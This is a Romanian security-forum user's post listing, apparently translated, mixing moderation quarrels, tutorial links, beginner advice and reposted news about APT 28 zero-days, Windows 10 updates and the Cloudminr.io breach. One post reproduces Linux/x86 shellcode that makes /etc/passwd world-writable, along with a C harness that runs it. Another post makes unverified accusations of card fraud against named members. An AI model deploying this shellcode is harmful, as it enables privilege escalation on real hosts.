fan_em

Members
  • Posts

    43
About fan_em

  • Birthday 04/02/1999

  1. em won't reply to my PM, maybe in public he'll be easier to reach. Hey @em, since I'm bothering you with this anyway, please tell me why you banned me from the chat? You did say you piss on my family, but are you now really at reckon's beck and call?
  2. Graffik was banned because he dealt in cards outside the forum, so why isn't reckon banned? Most people on the forum know what he does. @Reckon I know, reckon only sells them, he doesn't touch them + he makes scams in PHP for $50
  3. https://rstforums.com/forum/79187-rst-tutorial-complet-regex.rst
     https://rstforums.com/forum/87888-rst-tutorial-stack-based-buffer-overflow.rst
     https://rstforums.com/forum/82999-tutorial-securizare-kernel-sistem-linux-cu-selinux.rst
     https://rstforums.com/forum/80447-tutorial-optimizare-apache-server-varianta-debian-ubuntu.rst
     https://rstforums.com/forum/47076-http-load-balancing.rst
     and the most recent: https://rstforums.com/forum/103977-bookmarks-de-pe-rst.rst
  4. For Mario you can use any distribution; install Wine and after that you'll manage on your own. OS = operating system, by the way. This Matriux is a distribution that is based on another distribution and comes with a suite of preinstalled programs. That's why I asked you why you want to install it. Are you sure you need a distribution in order to be a hacker? Learn programming; if not, the security field is not for you.
  5. I don't think you answered my question.
  6. What do you need it for? I don't think anyone can recommend anything if you don't say what you need it for.
  7. fan_em

    hi

    Hi, RST is a good place if you want to start learning more about security and programming. I want to warn you about trolls, flamers and Aerosols (as far as possible, avoid them or ignore them). If you need help, there is a section on the forum specifically for that. I recommend you start with programming; the language doesn't matter. Remember, even searching about a given topic helps you learn. P.S.: use the help section only when you haven't found anything helpful on Google. Welcome! How do you know what this community does? Are you by any chance staff, or why are you speaking on behalf of the community? You have no right to give advice, because:
  8. An APT group thought to be tied to Russia is flying against conventional wisdom, having as recently as the last three weeks dropped its sixth zero-day in the past four months. Given the underground value of unpatched and unreported vulnerabilities, this is highly unusual behavior, even for a state-sponsored cyberespionage team. This week alone, two zero-days attributed to this team disappeared when they were patched by Microsoft and Oracle in Office and Java respectively. Researchers at iSight Partners reported the Office zero-day to Microsoft on June 30 and it was patched on Tuesday in MS15-070, an Office security bulletin that patched 13 other vulnerabilities in the software. Later that night, Oracle erased a Java zero-day in its quarterly Critical Patch Update that was used against a U.S.-based defense contractor and foreign military outfits. It was the first Java zero day actively exploited in the wild since 2013, experts said. APT 28 keeps a vast arsenal of malware and domains under its control, according to researchers Brian Bartholomew and Jonathan Leathery of iSight. “This indicates it’s not a handful of guys; this is an organization managing this stuff,” Bartholomew said, adding that the group has also been known to use cryptocurrency such as Bitcoin to buy domains in order to hide registration information and remain anonymous. “It’s hard to manage that much infrastructure that they own.” Five of the half-dozen zero days, Bartholomew said, were built in-house by APT 28, while the sixth, CVE-2015-5119, was a repurposed Flash 0day that was put into use 24 hours after it was uncovered after the Hacking Team breach. “They actually rewrote it, which is interesting. It’s not just a copy of the [Hacking Team] proof of concept with their own shell code added,” Bartholomew said. The Office zero day, CVE-2015-2424, was likely still under development since iSight researchers said it was still fairly buggy and unreliable. 
It was likely spread via spear phishing emails, specifically targeting individuals or groups within sensitive organizations. The lure found by iSight was a Word document purporting to be an analysis of the Iran nuclear deal. “It’s a heap corruption vulnerability in Office where it’s mishandling an object in memory, which allowed for remote code execution from the weaponized document,” Leathery said, adding that the message also included a CNN article on the Iran deal published June 28. The likely targets were the former Soviet republic of Georgia. The payload is a variant of the Sofacy or Sednit Trojan, which immediately opens a backdoor to a number of attacker-controlled domains where stolen data is sent. Some of the domains, iSight said, are benign or do not belong to the APT group, a false-flag of sorts. The targets are government agencies in Eastern Europe or NATO, along with critical industries such as nuclear, telecommunications, defense industrial base and diplomatic interests. The group is not only adept at gathering intelligence from foreign interests, but also focuses on internal dissidents and threats to national security in Russia, iSight said. One counter-terrorism operation attributed to this group is the so-called Cyber Caliphate hacktivist operation, where hackers posing as ISIS supporters set up lures via social media or forums trying to attract those sympathetic to the Islamic State. Once some confidence is established with a target via direct messaging, APT 28 would entice them to install an application that was malicious and allowed them to monitor the dissidents’ activities. Despite the fact that this particular Office—and Java—zero day has been patched, iSight believes APT 28 is well resourced and has more at its disposal. “This throws a wrench in their plans; usually they can get a few months out of a zero day before a patch is out,” Bartholomew said. 
“It’s unprecedented using this many zero days, but at the same time, they have access to developers who can build these or have the resources to buy them.” - See more at: https://threatpost.com/office-java-patches-erase-latest-apt-28-zero-days/113825
  9. /*
     # Title: Linux/x86 chmod('/etc/passwd',0777) - shellcode 42 bytes
     # Platform: linux/x86_64
     # Author: Mohammad Reza Espargham
     # Linkedin : https://ir.linkedin.com/in/rezasp
     # E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
     # Website : http://www.reza.es
     # Twitter : https://twitter.com/rezesp
     # FaceBook : https://www.facebook.com/mohammadreza.espargham

     Disassembly of section .text:

     00000000 <.text>:
        0:   6a 0f                   push   $0xf
        2:   58                      pop    %eax
        3:   68 90 90 ff 01          push   $0x1ff9090
        8:   59                      pop    %ecx
        9:   c1 e9 10                shr    $0x10,%ecx
        c:   68 90 73 77 64          push   $0x64777390
       11:   5b                      pop    %ebx
       12:   c1 eb 08                shr    $0x8,%ebx
       15:   53                      push   %ebx
       16:   68 2f 70 61 73          push   $0x7361702f
       1b:   68 2f 65 74 63          push   $0x6374652f
       20:   89 e3                   mov    %esp,%ebx
       22:   cd 80                   int    $0x80
       24:   b0 01                   mov    $0x1,%al
       26:   b3 01                   mov    $0x1,%bl
       28:   cd 80                   int    $0x80
     */

     #include <stdio.h>
     #include <string.h>

     int main(){
         unsigned char shellcode[]= "\x6a\x0f\x58\x68\x90\x90\xff\x01\x59\xc1\xe9\x10\x68\x90\x73\x77\x64\x5b\xc1\xeb\x08\x53\x68\x2f\x70\x61\x73\x68\x2f\x65\x74\x63\x89\xe3\xcd\x80\xb0\x01\xb3\x01\xcd\x80";

         /* strlen() returns size_t, so print it with %zu */
         fprintf(stdout,"Length: %zu\n\n",strlen((char *)shellcode));

         /* cast the byte array to a function pointer and call it */
         (*(void(*)()) shellcode)();
         return 0;
     }
  10. The best thing would be to be able to select which updates you want, as in previous versions...
  11. Windows 10 is all set to launch on July 29 and will also be available on USB drives for purchase in retail channels. So, if you are planning to install Windows 10 Home, one thing you must keep in your mind – You wish or not, the software updates for Microsoft’s new operating system will be mandatory. Microsoft is planning to make a significant change to its software update policy by "removing the option to DISABLE software updates in Windows 10 Home". This clearly indicates that all users of Windows operating system must agree to allow Microsoft to install software updates automatically.

      In Windows 8.1, users get four options for Windows Update's behavior, which include:

        • Download and Install Windows Updates Automatically
        • Download Windows Updates automatically but Choose when to Install them
        • Check for Updates but Choose when to Download and Install them
        • Never check for, Download, or Install Updates

      From a Security point of view, the last option, i.e. never to download or install updates, is not at all recommended by either the company or the security experts. However, the option is still there if Windows users really need it.

      In Windows 10, the options for Windows Update are cut to only two, which include:

        • Check, Download, Install, and Reboot automatically
        • Check, Download, Install automatically and then choose to Reboot

      Here is the EULA to which you agree to when you accept the terms of the licensing agreement:

      If this happens with the launch of Windows 10, it would be a notable change in any version of Windows OS as Microsoft has talked about Windows 10's Windows-as-a-Service approach that will receive continuous updates. Every software program needs frequent updates, but the ability of Windows users to permanently delay Windows software updates has made it difficult for Microsoft to keep its OS platform secure and up-to-date. And the only motive behind this change is to maintain the security of its users safe.
  12. Bitcoin Cloud Mining service Cloudminr.io has been hacked and its whole users database is on sale for 1 Bitcoin. The unknown hackers have successfully taken full control of the website's server and defaced the homepage of the website. Users visiting the website are greeted with a defaced homepage showing the partial database of around 1000 clients including their usernames and unencrypted passwords in completely plain text format. This clearly indicates that the company is not following the best security practices to secure their users private data as the passwords were not even hashed before storing into the database.

      Hackers offering around 80,000 users database for 1BTC

      The database of 1000 users shown on the website homepage is just a sample given by the hackers while they have compromised around 80,000 users database in total from the cloud mining service. The hackers are offering the entire database of thousands of users for the just 1BTC, which could be a goldmine for cyber-criminals and spammers.

      So far, there is not any details on whether Bitcoin wallets or simply parts of the website server were compromised. However, users of Cloudminr.io are recommended to change their passwords at any other service that uses the same combination of username and password as their Cloudminr account.
  13. Dear Aerosol, we are slightly disappointed by your tutorial; you have loads of knowledge and this is what you present to us. We all know what you're capable of, so please don't limit yourself to tutorials from around 2001.
  14. You should try multiple sources; don't rely on this app alone. Whether it pays off depends from person to person, it depends on how much effort you put in..